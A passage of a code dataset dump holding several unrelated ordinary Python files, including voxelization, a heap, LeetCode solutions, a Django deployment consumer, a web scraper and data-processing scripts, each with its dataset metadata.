\"\"\"\n Voxelize a mesh using ray queries.\n\n Parameters\n -------------\n mesh : Trimesh object\n Mesh to be voxelized\n pitch : float\n Length of voxel cube\n per_cell : (2,) int\n How many ray queries to make per cell\n\n Returns\n -------------\n voxels : (n, 3) int\n Voxel positions\n origin : (3, ) int\n Origin of voxels\n \"\"\"\n # how many rays per cell\n per_cell = np.array(per_cell).astype(np.int).reshape(2)\n # edge length of cube voxels\n pitch = float(pitch)\n\n # create the ray origins in a grid\n bounds = mesh.bounds[:, :2].copy()\n # offset start so we get the requested number per cell\n bounds[0] += pitch / (1.0 + per_cell)\n # offset end so arange doesn't short us\n bounds[1] += pitch\n # on X we are doing multiple rays per voxel step\n step = pitch / per_cell\n # 2D grid\n ray_ori = util.grid_arange(bounds, step=step)\n # a Z position below the mesh\n z = np.ones(len(ray_ori)) * (mesh.bounds[0][2] - pitch)\n ray_ori = np.column_stack((ray_ori, z))\n # all rays are along positive Z\n ray_dir = np.ones_like(ray_ori) * [0, 0, 1]\n\n # if you have pyembree this should be decently fast\n hits = mesh.ray.intersects_location(ray_ori, ray_dir)[0]\n\n # just convert hit locations to integer positions\n voxels = np.round(hits / pitch).astype(np.int64)\n\n # offset voxels by min, so matrix isn't huge\n origin = voxels.min(axis=0)\n voxels -= origin\n\n return voxels, origin\n\n\ndef fill_voxelization(occupied):\n \"\"\"\n Given a sparse surface voxelization, fill in between columns.\n\n Parameters\n --------------\n occupied: (n, 3) int, location of filled cells\n\n Returns\n --------------\n filled: (m, 3) int, location of filled cells\n \"\"\"\n # validate inputs\n occupied = np.asanyarray(occupied, dtype=np.int64)\n if not util.is_shape(occupied, (-1, 3)):\n raise ValueError('incorrect shape')\n\n # create grid and mark inner voxels\n max_value = occupied.max() + 3\n\n grid = np.zeros((max_value,\n max_value,\n max_value),\n dtype=np.int64)\n voxels_sparse = np.add(occupied, 1)\n\n grid.__setitem__(tuple(voxels_sparse.T), 1)\n\n for i in range(max_value):\n check_dir2 = False\n for j in range(0, max_value - 1):\n idx = []\n # find transitions first\n # transition positions are from 0 to 1 and from 1 to 0\n eq = np.equal(grid[i, j, :-1], grid[i, j, 1:])\n idx = np.where(np.logical_not(eq))[0] + 1\n c = len(idx)\n check_dir2 = (c % 4) > 0 and c > 4\n if c < 4:\n continue\n for s in range(0, c - c % 4, 4):\n grid[i, j, idx[s]:idx[s + 3]] = 1\n if not check_dir2:\n continue\n\n # check another direction for robustness\n for k in range(0, max_value - 1):\n idx = []\n # find transitions first\n eq = np.equal(grid[i, :-1, k], grid[i, 1:, k])\n idx = np.where(np.logical_not(eq))[0] + 1\n c = len(idx)\n if c < 4:\n continue\n for s in range(0, c - c % 4, 4):\n grid[i, idx[s]:idx[s + 3], k] = 1\n\n # generate new voxels\n idx = np.where(grid == 1)\n filled = np.array([[idx[0][i] - 1,\n idx[1][i] - 1,\n idx[2][i] - 1]\n for i in range(len(idx[0]))])\n\n return filled\n\n\ndef points_to_indices(points, pitch, origin):\n \"\"\"\n Convert center points of an (n,m,p) matrix into its indices.\n\n Parameters\n ----------\n points: (q, 3) float, center points of voxel matrix (n,m,p)\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n indices: (q, 3) int, list of indices\n \"\"\"\n points = np.asanyarray(points, dtype=np.float64)\n origin = np.asanyarray(origin, dtype=np.float64)\n pitch = float(pitch)\n\n if points.shape != (points.shape[0], 3):\n raise ValueError('shape of points must be (q, 3)')\n\n if origin.shape != (3,):\n raise ValueError('shape of origin must be (3,)')\n\n indices = np.round((points - origin) / pitch + 0.5).astype(int)\n return indices\n\n\ndef indices_to_points(indices, pitch, origin):\n \"\"\"\n Convert indices of an (n,m,p) matrix into a set of voxel center points.\n\n Parameters\n ----------\n indices: (q, 3) int, index of voxel matrix (n,m,p)\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n points: (q, 3) float, list of points\n \"\"\"\n indices = np.asanyarray(indices, dtype=np.float64)\n origin = np.asanyarray(origin, dtype=np.float64)\n pitch = float(pitch)\n\n if indices.shape != (indices.shape[0], 3):\n raise ValueError('shape of indices must be (q, 3)')\n\n if origin.shape != (3,):\n raise ValueError('shape of origin must be (3,)')\n\n points = (indices - 0.5) * pitch + origin\n return points\n\n\ndef matrix_to_points(matrix, pitch, origin):\n \"\"\"\n Convert an (n,m,p) matrix into a set of points for each voxel center.\n\n Parameters\n -----------\n matrix: (n,m,p) bool, voxel matrix\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n points: (q, 3) list of points\n \"\"\"\n indices = np.column_stack(np.nonzero(matrix))\n points = indices_to_points(indices=indices, pitch=pitch, origin=origin)\n return points\n\n\ndef matrix_to_marching_cubes(matrix, pitch, origin):\n \"\"\"\n Convert an (n,m,p) matrix into a mesh, using marching_cubes.\n\n Parameters\n -----------\n matrix: (n,m,p) bool, voxel matrix\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n mesh: Trimesh object, generated by meshing voxels using\n the marching cubes algorithm in skimage\n \"\"\"\n from skimage import measure\n from .base import Trimesh\n\n matrix = np.asanyarray(matrix, dtype=np.bool)\n\n rev_matrix = np.logical_not(matrix) # Takes set about 0.\n # Add in padding so marching cubes can function properly with\n # voxels on edge of AABB\n pad_width = 1\n rev_matrix = np.pad(rev_matrix,\n pad_width=(pad_width),\n mode='constant',\n constant_values=(1))\n\n # pick between old and new API\n if hasattr(measure, 'marching_cubes_lewiner'):\n func = measure.marching_cubes_lewiner\n else:\n func = measure.marching_cubes\n\n # Run marching cubes.\n meshed = func(volume=rev_matrix,\n level=.5, # it is a boolean voxel grid\n spacing=(pitch,\n pitch,\n pitch))\n\n # allow results from either marching cubes function in skimage\n # binaries available for python 3.3 and 3.4 appear to use the classic\n # method\n if len(meshed) == 2:\n log.warning('using old marching cubes, may not be watertight!')\n vertices, faces = meshed\n normals = None\n elif len(meshed) == 4:\n vertices, faces, normals, vals = meshed\n\n # Return to the origin, add in the pad_width\n vertices = np.subtract(np.add(vertices, origin), pad_width * pitch)\n # create the mesh\n mesh = Trimesh(vertices=vertices,\n faces=faces,\n vertex_normals=normals)\n return mesh\n\n\ndef sparse_to_matrix(sparse):\n \"\"\"\n Take a sparse (n,3) list of integer indexes of filled cells,\n turn it into a dense (m,o,p) matrix.\n\n Parameters\n -----------\n sparse: (n,3) int, index of filled cells\n\n Returns\n ------------\n dense: (m,o,p) bool, matrix of filled cells\n \"\"\"\n\n sparse = np.asanyarray(sparse, dtype=np.int)\n if not util.is_shape(sparse, (-1, 3)):\n raise ValueError('sparse must be (n,3)!')\n\n shape = sparse.max(axis=0) + 1\n matrix = np.zeros(np.product(shape), dtype=np.bool)\n multiplier = np.array([np.product(shape[1:]), shape[2], 1])\n\n index = (sparse * multiplier).sum(axis=1)\n matrix[index] = True\n\n dense = matrix.reshape(shape)\n return dense\n\n\ndef multibox(centers, pitch):\n \"\"\"\n Return a Trimesh object with a box at every center.\n\n Doesn't do anything nice or fancy.\n\n Parameters\n -----------\n centers: (n,3) float, center of boxes that are occupied\n pitch: float, the edge length of a voxel\n\n Returns\n ---------\n rough: Trimesh object representing inputs\n \"\"\"\n from . import primitives\n from .base import Trimesh\n\n b = primitives.Box(extents=[pitch, pitch, pitch])\n\n v = np.tile(centers, (1, len(b.vertices))).reshape((-1, 3))\n v += np.tile(b.vertices, (len(centers), 1))\n\n f = np.tile(b.faces, (len(centers), 1))\n f += np.tile(np.arange(len(centers)) * len(b.vertices),\n (len(b.faces), 1)).T.reshape((-1, 1))\n\n rough = Trimesh(vertices=v, faces=f)\n\n return rough\n\n\ndef boolean_sparse(a, b, operation=np.logical_and):\n \"\"\"\n Find common rows between two arrays very quickly\n using 3D boolean sparse matrices.\n\n Parameters\n -----------\n a: (n, d) int, coordinates in space\n b: (m, d) int, coordinates in space\n operation: numpy operation function, ie:\n np.logical_and\n np.logical_or\n\n Returns\n -----------\n coords: (q, d) int, coordinates in space\n \"\"\"\n # 3D sparse arrays, using wrapped scipy.sparse\n # pip install sparse\n import sparse\n\n # find the bounding box of both arrays\n extrema = np.array([a.min(axis=0),\n a.max(axis=0),\n b.min(axis=0),\n b.max(axis=0)])\n origin = extrema.min(axis=0) - 1\n size = tuple(extrema.ptp(axis=0) + 2)\n\n # put nearby voxel arrays into same shape sparse array\n sp_a = sparse.COO((a - origin).T,\n data=np.ones(len(a), dtype=np.bool),\n shape=size)\n sp_b = sparse.COO((b - origin).T,\n data=np.ones(len(b), dtype=np.bool),\n shape=size)\n\n # apply the logical operation\n # get a sparse matrix out\n applied = operation(sp_a, sp_b)\n # reconstruct the original coordinates\n coords = np.column_stack(applied.coords) + origin\n\n return coords\n","sub_path":"trimesh/voxel.py","file_name":"voxel.py","file_ext":"py","file_size_in_byte":24913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"442396467","text":"# Copyright 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom enums.error_code import JRPCErrorCodes\n\nclass UnknownException(Exception):\n \"\"\"Any unknown error and status is returned in \n the following generic JSON RPC error format\"\"\"\n\n def __init__(self, message, data):\n\n self.error = {\n \"jsonrpc\": \"2.0\", # as per JSON RPC spec\n \"id\": 0, # the same as in input\n \"error\": { # as per JSON RPC spec\n \"code\": JRPCErrorCodes.UNKNOWN_ERROR,\n \"message\": message,\n \"data\": data\n } \n }\n","sub_path":"src/internal/exceptions/unknown_error.py","file_name":"unknown_error.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"438108839","text":"# coding: utf8\nfrom phxweb.customer import DefConsumer\nfrom phxweb import settings\nfrom saltstack.saltapi import SaltAPI\nfrom monitor.models import project_t, minion_t, minion_ip_t, svn_master_t\nfrom upgrade.models import svn_customer_t\nfrom saltstack.command import Command\nfrom accounts.limit import LimitAccess\nfrom accounts.views import getIp, getProjects\nfrom accounts.models import user_project_authority_t\nfrom detect.telegram import sendTelegram\n\nimport json, logging, time, urlparse, requests\n\nlogger = logging.getLogger('django')\n\n#telegram 参数\nmessage = settings.message_TEST\n\nclass ApacheConfig(DefConsumer):\n # Set to True to automatically port users from HTTP cookies\n # (you don't need channel_session_user, this implies it)\n http_user = True\n channel_session_user = True\n\n # Set to True if you want it, else leave it out\n strict_ordering = False\n\n def receive(self, text=None, bytes=None, **kwargs):\n \"\"\"\n Called when a message is received with either text or bytes\n filled out.\n \"\"\"\n #self.close()\n\n self.clientip = '127.0.0.1'\n self.username = self.message.user.username\n try:\n self.role = self.message.user.userprofile.role\n except:\n self.role = 'none'\n\n data = json.loads(self.message['text'])\n step = 0\n\n ### step one ###\n info = {}\n info['step'] = 'one'\n self.message.reply_channel.send({'text': json.dumps(info)})\n\n ### final step ###\n info = {}\n info['step'] = 'final'\n info['results'] = {}\n svn_customer_dict = {}\n\n count = 1\n for customer_id in data['customer']:\n customer_name = 'none'\n for value in data['item']['svn_customer']['in']:\n if int(customer_id) == value['id']:\n customer_name = value['name']\n break\n try:\n svn_customer = svn_customer_t.objects.get(id=customer_id)\n except Exception as e:\n message['text'] = \"所选中的客户[%s] 记录不存在,请联系管理员!\" %customer_name + '\\nException: ' + str(e)\n logger.error(message['text'])\n sendTelegram(message).send()\n info['results'][data['minion_id']+'-'+str(count)] = message['text']\n self.message.reply_channel.send({'text': json.dumps(info)})\n self.close()\n return False\n count += 1\n else:\n svn_customer_dict[svn_customer.name] = {\n 'master_ip': [ ip.strip() for ip in svn_customer.master_ip.split('\\r\\n') if ip.strip() != \"\" ],\n 'ip': [ ip.strip() for ip in svn_customer.ip.split('\\r\\n') if ip.strip() != \"\" ],\n 'port': svn_customer.port,\n 'ismaster': True if svn_customer.ismaster == 1 else False, \n 'isrsynccode': True if svn_customer.isrsynccode == 1 else False,\n 'cmd': [cmd.strip() for cmd in svn_customer.cmd.split('\\r\\n') if cmd.strip() != \"\" ],\n 'gray_domain': svn_customer.gray_domain,\n 'online_domain': svn_customer.online_domain,\n 'src_d': svn_customer.src_d,\n 'dst_d': svn_customer.dst_d,\n }\n\n try:\n svn_master = svn_master_t.objects.get(id=data['svn_master_id'])\n api = svn_master.api.strip('/') + '/apache_config'\n logger.info('posting: %s' %api)\n #logger.info('posting: %s' %svn_customer_dict)\n ret = requests.post(api, data=json.dumps(svn_customer_dict))\n except Exception as e:\n message['text'] = 'Exception: ' + str(e)\n logger.error(message['text'])\n sendTelegram(message).send()\n info['results'][data['minion_id']] = message['text']\n else:\n info['results'][data['minion_id']] = ret.content\n\n self.message.reply_channel.send({'text': json.dumps(info)})\n self.close()","sub_path":"phxweb/upgrade/deploy/apache_config_customer.py","file_name":"apache_config_customer.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"20375858","text":"# Author: River Mao\n# 功能: 计算从同一张图片上裁剪下来的两张图片的重叠率\nimport cv2\nimport numpy as np\n\ndef cal_overlap(ROI1P, ROI2P, grayImg, if_show = False):\n '''\n 计算同一张图片上的两个区域的重叠率\n input:\n ROI1P: 区域一的坐标位置,[y, x, height, width],输入时默认第一位位置的ROI为正样本区\n ROI2P: 区域二的坐标,[y, x, height, width],输入时设置为待检测的区域,默认ROI1P和ROI2P大小相同\n grayImg:灰度图像\n if_show: 选择是否显示图像掩膜\n\n output:\n 重叠率:重叠区域/兴趣区\n '''\n\n height, width = np.shape(grayImg)\n ROI1 = np.zeros((height, width))\n ROI2 = np.zeros((height, width))\n ROI1y1, ROI1x1 = ROI1P[0],ROI1P[1]\n ROI1y2, ROI1x2 = ROI1y1 + ROI1P[2], ROI1x1 + ROI1P[3]\n ROI2y1, ROI2x1 = ROI2P[0], ROI2P[1]\n ROI2y2, ROI2x2 = ROI2y1 + ROI2P[2], ROI2x1 + ROI2P[3]\n ROI1[ROI1y1:ROI1y2, ROI1x1:ROI1x2] = 0.4\n ROI2[ROI2y1:ROI2y2, ROI2x1:ROI2x2] = 0.4\n overlapArea = ROI1 * ROI2\n if if_show:\n\n cv2.namedWindow('ROI1',cv2.WINDOW_NORMAL)\n cv2.imshow('ROI1', ROI1)\n cv2.waitKey(0)\n cv2.namedWindow('ROI2',cv2.WINDOW_NORMAL)\n cv2.imshow('ROI2', ROI2)\n cv2.waitKey(0)\n cv2.namedWindow('overlap', cv2.WINDOW_NORMAL)\n cv2.imshow('overlap', ROI1+ROI2)\n cv2.waitKey(0)\n\n overlapRatio = np.count_nonzero(overlapArea)/(ROI1P[2]* ROI1P[3])\n\n return overlapRatio\n\n\n# 测试\nif __name__ == '__main__':\n grayImg = cv2.cvtColor(cv2.imread('testImg.png'), cv2.COLOR_BGR2GRAY)\n ROI1P = [0,0,100,100]\n ROI2P = [50,50,100,100]\n overlapRatio = cal_overlap(ROI1P, ROI2P,grayImg)\n print(\"the overlap ratio is:\", overlapRatio)\n","sub_path":"code/data/overlap.py","file_name":"overlap.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"509072884","text":"from coverage import coverage\nimport re\n\nfrom django.conf import settings\nfrom django.utils.importlib import import_module\nfrom pkgutil import walk_packages\n\nfrom discoverage.settings import TESTED_APPS_VAR_NAME\n\nclass CoverageHandler(coverage):\n def __init__(self, suite, omit, excluded_patterns, module_name_app_discovery, module_name_discovery_pattern,\n pkg_name_app_discovery):\n super(CoverageHandler, self).__init__(omit=omit)\n self.suite = suite\n self.module_name_discovery_pattern = module_name_discovery_pattern\n self.module_name_app_discovery = module_name_app_discovery\n self.pkg_name_app_discovery = pkg_name_app_discovery\n\n for pattern in excluded_patterns:\n self.exclude(pattern)\n\n def __enter__(self):\n self.start()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stop()\n\n apps = self.find_coverage_apps()\n app_modules = self.get_all_modules(apps)\n\n self.actual_coverage_percent = self.report(app_modules)\n\n def get_apps(self, obj):\n return list(getattr(obj, TESTED_APPS_VAR_NAME, []))\n\n def find_coverage_apps(self):\n coverage_apps = set()\n inspected = set()\n app_pkgs = dict((app.split('.')[-1], app) for app in settings.INSTALLED_APPS)\n\n for test in self.suite:\n class_name = repr(test.__class__)\n\n if class_name in inspected:\n continue\n\n test_apps = self.get_apps(test)\n\n if test.__module__ not in inspected:\n test_module = import_module(test.__module__)\n test_apps.extend(self.get_apps(test_module))\n inspected.add(test.__module__)\n pkg = test_module.__package__\n\n if self.module_name_app_discovery:\n module_name = test.__module__.split(pkg + '.')[-1]\n\n try:\n guessed_app_name = re.match(self.module_name_discovery_pattern,\n module_name).group(1)\n test_apps.append(app_pkgs[guessed_app_name])\n except (KeyError, AttributeError, IndexError):\n pass\n\n if pkg not in inspected:\n test_pkg = import_module(pkg)\n test_apps.extend(self.get_apps(test_pkg))\n inspected.add(pkg)\n\n if self.pkg_name_app_discovery:\n subpkg = pkg.split('.')[-1]\n try:\n test_apps.append(app_pkgs[subpkg])\n except KeyError:\n pass\n\n inspected.add(class_name)\n coverage_apps.update(test_apps)\n\n return list(coverage_apps)\n\n def get_all_modules(self, apps):\n modules = set()\n\n for app in apps:\n app_module = import_module(app)\n modules.add(app_module)\n app_path = app_module.__path__\n\n for pkg_data in walk_packages(app_path, prefix=u'{0}.'.format(app)):\n current_module = import_module(pkg_data[1])\n modules.add(current_module)\n\n return list(modules)\n\n def report(self, app_modules):\n return super(CoverageHandler, self).report(app_modules)\n","sub_path":"discoverage/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"469103664","text":"# - Binary tree structure of a heap ican be stored in an array by letting the left and right child of each node n\n# be at indices 2n + 1 and 2n + 2 respectively.\n# - If either index is out of range, there is no child node.\n# - Max heap property says: a parent node must be greater than or equal to its children.\n\n\nclass Heap:\n def __init__(self):\n self.storage = []\n\n def insert(self, value):\n # add value to the end of the array\n self.storage.append(value)\n # check that it's smaller than its parent\n inserted_node_index = len(self.storage) - 1\n parent_node_index = self.get_parent_index(inserted_node_index)\n # swapping = True\n while self.storage[inserted_node_index] > self.storage[parent_node_index] and parent_node_index >= 0:\n # swapping: \n # if not, swap them, and check again\n temp = self.storage[parent_node_index]\n self.storage[parent_node_index] = self.storage[inserted_node_index]\n self.storage[inserted_node_index] = temp\n # swapping = self._bubble_up(inserted_node_index)\n\n inserted_node_index = parent_node_index\n # self.get_parent_index(inserted_node_index)\n parent_node_index = self.get_parent_index(inserted_node_index)\n\n # if it is, stop\n # (Call bubble_up, for test...?)\n self._bubble_up(0)\n\n def delete(self):\n # swap first element with last\n first = self.storage[0]\n self.storage[0] = self.storage[len(self.storage) - 1]\n self.storage[len(self.storage) - 1] = first\n\n # remove last element\n self.storage = self.storage[:-1]\n\n # check that new first element is larger than both its children\n # if it's not, swap it with the larger child\n # now check it against its children, and so on...\n index_to_check = 0\n # child_indices = self.get_child_indices(index_to_check)\n while index_to_check != None:\n # (child_indices[0] < len(self.storage) and child_indices[1] < len(self.storage)) and \\\n # (self.storage[index_to_check] < self.storage[child_indices[0]] or \n # self.storage[index_to_check] < self.storage[child_indices[1]]):\n index_to_check = self._sift_down(index_to_check)\n # child_indices = self.get_child_indices(index_to_check)\n \n return first\n\n def get_max(self):\n return self.storage[0]\n\n def get_size(self):\n return len(self.storage)\n\n def _bubble_up(self, index):\n parent_index = self.get_parent_index(index)\n\n if parent_index < 0:\n return\n\n if self.storage[parent_index] < self.storage[index]:\n temp = self.storage[parent_index]\n self.storage[parent_index] = self.storage[index]\n self.storage[index] = temp\n return True\n \n return False\n\n def _sift_down(self, index):\n child_indices = self.get_child_indices(index)\n if child_indices[0] >= len(self.storage) and child_indices[1] >= len(self.storage):\n return\n \n max_child_index = None\n if child_indices[1] >= len(self.storage):\n max_child_index = child_indices[0]\n else:\n max_child_index = child_indices[0] if self.storage[child_indices[0]] >= self.storage[child_indices[1]] else child_indices[1]\n \n self._bubble_up(max_child_index)\n\n return max_child_index\n\n # helpers\n def get_parent_index(self, index):\n return (index - 1) // 2 if index % 2 == 1 else (index - 2) // 2\n \n def get_child_indices(self, index):\n return (2*index + 1, 2*index + 2)\n","sub_path":"heap/max_heap.py","file_name":"max_heap.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"104213951","text":"\"\"\"\n给定一个包含非负整数的 m x n 网格 grid ,请找出一条从左上角到右下角的路径,使得路径上的数字总和为最小。\n\n说明:每次只能向下或者向右移动一步。\n\nhttps://leetcode-cn.com/problems/minimum-path-sum/\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n # 优化:可以直接更改grid原数组\n dp = [grid[0][0]]\n for i in range(1, len(grid[0])):\n dp.append(dp[i - 1] + grid[0][i])\n for i in range(1, len(grid)):\n v = grid[i]\n for j in range(len(v)):\n if i == 0:\n dp[0] += v[0]\n else:\n dp[j] = min(dp[j - 1], dp[j]) + v[j]\n return dp[-1]\n\n\ngrid = [[1, 3, 1], [1, 5, 1], [4, 2, 1]]\nprint(Solution().minPathSum(grid))\ngrid = [[1, 2, 3], [4, 5, 6]]\nprint(Solution().minPathSum(grid))\n\n\"\"\"\n\n作者:jyd\n链接:https://leetcode-cn.com/problems/minimum-path-sum/solution/zui-xiao-lu-jing-he-dong-tai-gui-hua-gui-fan-liu-c/\n来源:力扣(LeetCode)\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass Solution:\n def minPathSum(self, grid: [[int]]) -> int:\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if i == j == 0:\n continue\n elif i == 0:\n grid[i][j] = grid[i][j - 1] + grid[i][j]\n elif j == 0:\n grid[i][j] = grid[i - 1][j] + grid[i][j]\n else:\n grid[i][j] = min(grid[i - 1][j], grid[i][j - 1]) + grid[i][j]\n return grid[-1][-1]\n","sub_path":"algorithm/动态规划/64. 最小路径和.py","file_name":"64. 最小路径和.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"546819841","text":"class Node(object):\n \"\"\"\n Node contains two objects - a left and a right child, both may be a Node or both None,\n latter representing a leaf\n \"\"\"\n\n def __init__(self, left=None, right=None):\n super(Node, self).__init__()\n self.left = left\n self.right = right\n\n def __str__(self):\n \"\"\"\n Default inorder print\n \"\"\"\n if self.left is None and self.right is None:\n return \"( )\"\n else:\n return \"( \" + str(self.left) + \" \" + str(self.right) + \" )\"\n\n def __eq__(self, other):\n if self.left is None and self.right is None:\n return other.left is None and other.right is None\n elif other.left is None and other.right is None:\n return False\n else:\n return self.left == other.left and self.right == other.right\n\n\ndef mirrorTree(node):\n \"\"\"\n Returns the mirror image of the tree rooted at node\n \"\"\"\n if node == Node():\n mirror_node = Node()\n else:\n mirror_node = Node(mirrorTree(node.right), mirrorTree(node.left))\n return mirror_node\n\n\ndef allTrees(n):\n \"\"\"\n Returns a list of all unique trees with n internal nodes\n \"\"\"\n if n == 0:\n return [Node()]\n\n trees = []\n for l_count in range(0, n):\n trees += [Node(x, y) for x in allTrees(l_count) for y in allTrees(n - 1 - l_count)]\n return trees\n\n\ndef allSymTrees(n):\n \"\"\"\n Returns a list of all unique symmetrical trees with n internal nodes\n \"\"\"\n if n == 0:\n return [Node()]\n elif n % 2:\n return [Node(sub_tree, mirrorTree(sub_tree)) for sub_tree in allTrees(n // 2)]\n else:\n return []\n\n\nif __name__ == '__main__':\n for x in allSymTrees(int(input())):\n print(x)\n node = Node(Node(Node(), Node()), Node())\n print(node)\n","sub_path":"Final/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"566146038","text":"from collections import namedtuple\r\nfrom lib.compute import (compute_u_from_delta_p, compute_average_and_stdev,\r\n compute_delta_p_from_u)\r\n\r\nWindMeasures = namedtuple('wind_measures', [\r\n 't', 'Fx', 'Fy', 'Fz', 'Mx', 'My', 'Mz', 'p_ref', 'u_gil', 'p_rap'])\r\nWindProperties = namedtuple('WindProperties', [\r\n 'delta_p_ref',\r\n 'u_ref',\r\n 'delta_p_gil',\r\n 'u_gil',\r\n 'alpha_u_ref_gil',\r\n 'alpha_p_ref_gil',\r\n])\r\n\r\n\r\ndef sanitize_wind_measures(wind_measures):\r\n return [\r\n (t, p_ref, u_gil)\r\n for (t, Fx, Fy, Fz, Mx, My, Mz, p_ref, u_gil, p_rap) in wind_measures\r\n if p_ref > 0 and u_gil > 0\r\n ]\r\n\r\n\r\ndef compute_wind_measures(wind_measures, rho, k_ref):\r\n u_measures = [\r\n (\r\n t,\r\n p_ref,\r\n compute_u_from_delta_p(p_ref, rho)*k_ref,\r\n compute_delta_p_from_u(u_gil, rho),\r\n u_gil,\r\n )\r\n for (t, p_ref, u_gil) in wind_measures\r\n ]\r\n\r\n alpha_measures = [\r\n (\r\n t,\r\n u_ref/u_gil,\r\n p_ref/p_gil,\r\n\r\n )\r\n for (t, p_ref, u_ref, p_gil, u_gil) in u_measures\r\n ]\r\n\r\n (p_ref_average, _) = compute_average_and_stdev(\r\n [float(p_ref) for (_, p_ref, _) in wind_measures])\r\n (u_ref_average, _) = compute_average_and_stdev(\r\n [float(u_ref) for (_, _, u_ref, _, _) in u_measures])\r\n (p_gil_average, _) = compute_average_and_stdev(\r\n [float(p_gil) for (_, _, _, p_gil, _) in u_measures])\r\n (u_gil_average, _) = compute_average_and_stdev(\r\n [float(u_gil) for (_, _, u_gil) in wind_measures])\r\n (alpha_u_ref_gil_average, _) = compute_average_and_stdev(\r\n [float(alpha_u_ref_gil) for (_, alpha_u_ref_gil, _) in alpha_measures])\r\n (alpha_p_ref_gil_average, _) = compute_average_and_stdev(\r\n [float(alpha_p_ref_gil) for (_, _, alpha_p_ref_gil) in alpha_measures])\r\n\r\n return [WindProperties(p_ref_average, u_ref_average, p_gil_average, u_gil_average,\r\n alpha_u_ref_gil_average, alpha_p_ref_gil_average,)]\r\n\r\n\r\ndef convert_raw_str_value_to_float(str):\r\n return float(str.replace(',', '.'))\r\n\r\n\r\nclass wind_measure_model:\r\n def __init__(self, rho, k_ref):\r\n # interface model\r\n self.parsing_output_model = lambda t, Fx, Fy, Fz, Mx, My, Mz, p_ref, u_gil, p_rap: WindMeasures(\r\n t, Fx, Fy, Fz, Mx, My, Mz, convert_raw_str_value_to_float(p_ref), convert_raw_str_value_to_float(u_gil), p_rap)\r\n self.sanitize = lambda measures_to_sanitize: sanitize_wind_measures(\r\n measures_to_sanitize)\r\n self.compute = lambda measures_to_compute: compute_wind_measures(\r\n measures_to_compute, rho, k_ref)\r\n\r\n # specific wind_measure_model fields\r\n self.rho = rho\r\n self.k_ref = k_ref\r\n","sub_path":"models/wind_measure.py","file_name":"wind_measure.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"48600031","text":"import lxml.html\nimport urllib.request\nimport urllib.error\nimport re\nfrom webScr16 import download as download\n#from link_crawler import link_crawler\nFIELDS = ('area', 'population', 'iso', 'country', 'capital', 'continent', 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format', 'postal_code_regex', 'languages', 'neighbours')\ndef scrape_callback(url,html):\n if re.search('/view/',url):\n tree=lxml.html.fromstring(html)\n row = [tree.cssselect('table>tr#places_%s__row>td.w2p_fw'%field)[0].text_content()for field in FIELDS]\n print (url)\n for item in row:\n print (item)\n\n\n\n\nif __name__=='__main__':\n url='http://example.webscraping.com/places/view/United-Kindom-239'\n html=download(url)\n links=[]\n # link_crawler('http://example.webscraping.com','/(index|view)',scrape_callback)\n links.extend(scrape_callback(url,html)or [])","sub_path":"SrcWeb2-2-6.py","file_name":"SrcWeb2-2-6.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"47911882","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#Book P14. copyright by Mr Kang\r\n#2021/10/23 \r\nfrom pandas import read_csv\r\nimport matplotlib.pyplot as plt\r\nfilename='pima.csv'\r\n#names=['pre','glu','plas','skin','test','mass','pedi','age','class']\r\ndata=read_csv(filename)\r\npeek=data.head(10)\r\nprint(peek)\r\nprint(data.skew())\r\ndata.hist()\r\nplt.show()\r\n#data.plot(kind='density',subplots=True,layout=(3,3),sharex=False)\r\n#plt.show()","sub_path":"scipy.py","file_name":"scipy.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"209393369","text":"class handler:\n def __init__(self, influxHost, username, password, database, topic, influxPort=8086):\n from influxdb import InfluxDBClient\n import logging\n import traceback\n\n self.influxClient = InfluxDBClient(\n influxHost, influxPort, username, password)\n 